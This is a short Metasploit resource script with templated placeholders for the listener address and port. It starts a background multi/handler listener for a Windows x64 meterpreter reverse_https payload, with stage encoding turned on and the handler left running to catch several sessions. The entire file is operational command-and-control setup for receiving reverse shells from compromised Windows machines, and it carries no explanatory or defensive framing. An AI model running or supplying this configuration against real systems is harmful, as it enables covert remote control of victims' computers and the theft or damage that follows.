use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST !!!IP_MARK!!!
set LPORT !!!PORT_MARK!!!  
set exitonsession false
set enablestageencoding true
set exitfunc thread
run -j
